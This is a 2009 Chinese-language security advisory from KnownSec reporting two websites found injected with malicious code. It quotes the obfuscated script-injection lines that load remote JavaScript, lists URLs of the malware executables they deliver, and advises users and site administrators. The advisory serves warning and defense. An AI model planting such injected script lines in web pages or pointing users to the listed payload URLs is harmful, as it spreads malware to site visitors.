发布时间:Sun Dec 27 2009 22:38:44 UTC+0800
最后更新时间:Sun Dec 27 2009 22:38:44 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)今日监测到以下网站被植入恶意代码,用户访问以下挂马页面可能被安装木马病毒等恶意程序,导致敏感信息泄露甚至电脑被黑客控制。

网站名称:千寻网
网站链接:http://www.qooxoo.com/
恶意代码:
document.writeln (”<script src=\”http://k45mm.3322.org/googl%65.js\”><\/script>”);
document.writeln (”<script src=\”http://sbsbsb.7766.org/3%32.js\”><\/script>”);
document.writeln (”<script src=\”http://sbsbsb.7766%2Eorg/32.js\”><\/script>”);
所在页面:http://www.qooxoo.com/js/common.js
下载病毒:
http://viper.8gcc.com/down/my/39.exe
其他机构判定结果:
google:安全

网站名称:才经网
网站链接:http://www.ttvcn.com/
恶意代码:
<script src=http://%61%2E%70%70%6D%6D%6F%6F%2E%63%6E></script>
所在页面:http://www.ttvcn.com/
下载病毒:
http://fuck.ss.la/4.exe
http://tj.7766.org/h.exe
http://tv.ismydns.com.cn:8288/css/upload.css
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe
其他机构判定结果:
google:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/

推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您是以上网站的管理员,请尽快清除恶意代码,以免更多的用户受到威胁,影响用户的访问感受,损害网站的形象。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

Popularity: 9% [?]